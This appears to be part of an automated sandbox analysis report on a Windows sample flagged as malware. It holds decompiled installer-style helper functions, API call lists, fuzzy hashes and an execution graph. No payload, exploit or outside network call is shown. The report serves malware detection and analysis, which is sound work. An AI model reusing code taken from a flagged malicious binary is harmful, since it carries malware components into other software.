                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 3248276644-3355392842
                                                                            • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                            • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                            • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                            • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 89%
                                                                            			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}





                                                                            0x00405517
                                                                            0x00405521
                                                                            0x0040553d
                                                                            0x0040555f
                                                                            0x00405562
                                                                            0x00405568
                                                                            0x00405572
                                                                            0x00405573
                                                                            0x00405575
                                                                            0x0040557b
                                                                            0x0040557b
                                                                            0x00405585
                                                                            0x00000000
                                                                            0x00405593
                                                                            0x0040554a
                                                                            0x00405582
                                                                            0x00405582
                                                                            0x00000000
                                                                            0x00405582
                                                                            0x00405556
                                                                            0x00405558
                                                                            0x00000000
                                                                            0x00405558
                                                                            0x00405527
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040552e
                                                                            0x00000000

                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405542
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                              • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                            • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                            • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                            • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 90%
                                                                            			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                            0x00406419
                                                                            0x0040641b
                                                                            0x00406433
                                                                            0x00406438
                                                                            0x0040643d
                                                                            0x0040647b
                                                                            0x0040647b
                                                                            0x0040643f
                                                                            0x00406451
                                                                            0x0040645c
                                                                            0x00406462
                                                                            0x0040646d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040646d
                                                                            0x00406481

                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                            • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 0040645C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: Call
                                                                            • API String ID: 3356406503-1824292864
                                                                            • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                            • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                            • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                            • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}







                                                                            0x00403b58
                                                                            0x00403b60
                                                                            0x00403b67
                                                                            0x00403b6a
                                                                            0x00403b6a
                                                                            0x00403b6c
                                                                            0x00403b71
                                                                            0x00403b78
                                                                            0x00403b7e
                                                                            0x00403b82
                                                                            0x00403b83
                                                                            0x00403b8b

                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,76FA3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                            • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-3355392842
                                                                            • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                            • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                            • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                            • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405E58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 77%
                                                                            			E00405E58(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                            0x00405e59
                                                                            0x00405e63
                                                                            0x00405e66
                                                                            0x00405e6c
                                                                            0x00405e6d
                                                                            0x00405e6e
                                                                            0x00405e76
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405e76
                                                                            0x00405e78
                                                                            0x00405e80

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,80000000,00000003), ref: 00405E6E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3370423016
                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                            • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                            • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                            0x00405fa2
                                                                            0x00405fa4
                                                                            0x00405fa7
                                                                            0x00405fd3
                                                                            0x00405fac
                                                                            0x00405fb5
                                                                            0x00405fba
                                                                            0x00405fc5
                                                                            0x00405fc8
                                                                            0x00405fe4
                                                                            0x00405fca
                                                                            0x00405fd1
                                                                            0x00000000
                                                                            0x00405fd1
                                                                            0x00405fdd
                                                                            0x00405fe1
                                                                            0x00405fe1
                                                                            0x00405fdb
                                                                            0x00000000

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                            • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                            • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                            • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:0%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:118
                                                                            Total number of Limit Nodes:1
                                                                            execution_graph 61071 1d809580 621 API calls 61072 1d7cc170 652 API calls 61167 1d7d1f70 384 API calls 61168 1d7faf72 387 API calls 61169 1d7fa370 360 API calls 61170 1d809790 437 API calls 61171 1d853f9f 10 API calls 61172 1d8043a0 386 API calls 61075 1d7db950 581 API calls 61077 1d80b9b0 12 API calls 61078 1d7ee547 622 API calls 61079 1d7cc140 367 API calls 61176 1d808fbc 383 API calls 61177 1d7ca740 445 API calls 61180 1d80bbc0 579 API calls 61181 1d8087c0 359 API calls 61083 1d80c5c6 611 API calls 61182 1d851fc9 646 API calls 61085 1d7ed530 359 API calls 61184 1d876bde 629 API calls 61186 1d7cbf20 383 API calls 61086 1d8069e0 216 API calls 61190 1d7fcb10 GetPEB GetPEB GetPEB GetPEB 61191 1d7fc310 364 API calls 61093 1d805900 363 API calls 61193 1d85330c 361 API calls 61194 1d7c73f0 8 API calls 61062 1d812b10 LdrInitializeThunk 61096 1d85c51d 10 API calls 61195 1d889313 15 API calls 61098 1d7fe9e0 379 API calls 61100 1d808520 11 API calls 61196 1d80ab20 372 API calls 61197 1d80cb20 374 API calls 61063 1d812b20 61065 1d812b2a 61063->61065 61066 1d812b31 61065->61066 61067 1d812b3f LdrInitializeThunk 61065->61067 61198 1d808322 612 API calls 61103 1d801527 364 API calls 61105 1d7cc1d0 362 API calls 61199 1d7c9fd0 359 API calls 61200 1d7d3bd0 18 API calls 61107 1d80a130 11 API calls 61108 1d7c81c0 207 API calls 61204 1d7cbfc0 13 API calls 61205 1d7ce3c0 446 API calls 61109 1d7d1dc0 20 API calls 61110 1d7e51c0 410 API calls 61113 1d808d4f 387 API calls 61114 1d7ce9ac 655 API calls 61208 1d80a350 451 API calls 61209 1d80bb5b 362 API calls 61115 1d7c7da0 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 61117 1d80415f 361 API calls 61118 1d807960 362 API calls 61119 1d7c8196 10 API calls 61120 1d80716d 9 API calls 61123 1d804d70 LdrInitializeThunk 61068 1671468 NtAllocateVirtualMemory 61069 1671435 61068->61069 61126 1d80b890 407 API calls 61215 1d852e9f 411 API calls 61129 1d7c7860 208 API calls 61130 1d7c7060 RtlDebugPrintTimes 61217 1d7cb260 379 API calls 61131 1d7d3c60 20 API calls 61218 1d80cea0 408 API calls 61220 1d8122a0 807 API calls 61132 1d7ec850 612 API calls 61222 1d7d3640 372 API calls 61223 1d7fea40 391 API calls 61133 1d806cc0 365 API calls 61224 1d8032c0 364 API calls 61135 1d8168c0 11 API calls 61137 1d7cb830 609 API calls 61226 1d7c7a30 379 API calls 61227 1d7d2e32 383 API calls 61139 1d7cb420 214 API calls 61229 1d7cb620 209 API calls 61140 1d7d2022 219 API calls 61142 1d8054e0 207 API calls 61230 1d7c821b 388 API calls 61232 1d7c9610 613 API calls 61143 1d7d9810 615 API calls 61144 1d7d2410 662 API calls 61233 1d8096f0 365 API calls 61234 1d8062f0 665 API calls 61147 1d7c640d 616 API calls 61148 1d7cec0b 652 API calls 61235 1d7c6e00 RtlDebugPrintTimes RtlDebugPrintTimes 61237 1d7fd600 791 API calls 61149 1d7facf0 368 API calls 61150 1d7fccf0 GetPEB GetPEB 61151 1d812010 11 API calls 61239 1d7c72e0 358 API calls 61152 1d7d58e0 901 API calls 61240 1d7d3ee2 20 API calls 61241 1d7f66e0 456 API calls 61154 1d7ff4d0 371 API calls 61155 1d800030 358 API calls 61243 1d806e30 11 API calls 61245 1d807a33 811 API calls 61156 1d7cb0c0 451 API calls 61247 1d80f240 363 API calls 61248 1d816e40 9 API calls 61249 1d7c82b0 360 API calls 61157 1d7ce0a4 387 API calls 61254 1d7cbea0 370 API calls 61158 1d7d00a0 620 API calls 61255 1d7d06a0 387 API calls 61159 1d7cc090 383 API calls 61257 1d7cfe90 15 API calls 61258 1d7ca290 575 API calls 61259 1d7dc690 GetPEB 61260 1d7ed690 11 API calls 61261 1d80ce70 384 API calls 61263 1d7fbe80 359 API calls

                                                                            Executed Functions

                                                                            Function 01671468 Relevance: 1.6, APIs: 1, Instructions: 50memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 1671468-16714a3 NtAllocateVirtualMemory 1 1671435 0->1 2 16714a5-16714e0 0->2
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL ref: 01671473
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210648935807.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1660000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 6bd6cfe0b5221bbead50ebec75a970b6ff2369096bf27c30b12300d2a59c3abb
                                                                            • Instruction ID: 21e5c73aedc0fb555a0a46ff90d9b6b3b18c2ab30ff98a81fe657a8dfd541e52
                                                                            • Opcode Fuzzy Hash: 6bd6cfe0b5221bbead50ebec75a970b6ff2369096bf27c30b12300d2a59c3abb
                                                                            • Instruction Fuzzy Hash: FC019963A05B5A8FC313DE2CDC82A4EBEB2EA51950354077F8031DB7C6E352810B8292
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D812D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 9 1d812d10-1d812d1c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d88eb80e4b534413c3980b100a72e46d32decc73382c01e32b1c4275829593c8
                                                                            • Instruction ID: e3ecd6c5dd03bf93acf82fd5af41466341e51f6459f4413ae697a6afcf1f70df
                                                                            • Opcode Fuzzy Hash: d88eb80e4b534413c3980b100a72e46d32decc73382c01e32b1c4275829593c8
                                                                            • Instruction Fuzzy Hash: 3990023125100413D9116159460470B001947D0241FD2C816F0414518DD66E8996F123
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D812B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 8 1d812b90-1d812b9c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 98d58460c584a7a177e744a3826fbd47e6b126b274aa6681cb0d1d69a9bec179
                                                                            • Instruction ID: ad50fc3984c5715075e51c1d2eae1cfdb236cbe1bc178b3a03e7dbf4bf3e8b2a
                                                                            • Opcode Fuzzy Hash: 98d58460c584a7a177e744a3826fbd47e6b126b274aa6681cb0d1d69a9bec179
                                                                            • Instruction Fuzzy Hash: 7A90023125108802D9106159850474E001547D0301FD6C815F4414618DC6AD88D5B123
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D812B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 7 1d812b10-1d812b1c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 413c0873b88a3eebe35eab4dbf728e41ac9f0f58622a21f5bd16bb47d95708fa
                                                                            • Instruction ID: 6addd082275779705d02bc8246a5a0b8ba18d0a8a04c4f7e49f2c2fa49234fb9
                                                                            • Opcode Fuzzy Hash: 413c0873b88a3eebe35eab4dbf728e41ac9f0f58622a21f5bd16bb47d95708fa
                                                                            • Instruction Fuzzy Hash: 0B90023125100802D9807159450474E001547D1301FD2C419F0015614DCA2D8A9DB7A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D812B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3 1d812b2a-1d812b2f 4 1d812b31-1d812b38 3->4 5 1d812b3f-1d812b46 LdrInitializeThunk 3->5
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4a6fe387cf9b77ab9f59a1856aed73ed48df6e64c0447605d6d491d4be28fe51
                                                                            • Instruction ID: a84da4ab08504ae2621b8c900b060832708781215b6c17256189d4500c209bba
                                                                            • Opcode Fuzzy Hash: 4a6fe387cf9b77ab9f59a1856aed73ed48df6e64c0447605d6d491d4be28fe51
                                                                            • Instruction Fuzzy Hash: 49B09B719414C5CEDA01D760470871B791067D0701F57C455F1460641E473CC0D5F277
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 1D87FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMONCrypto
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
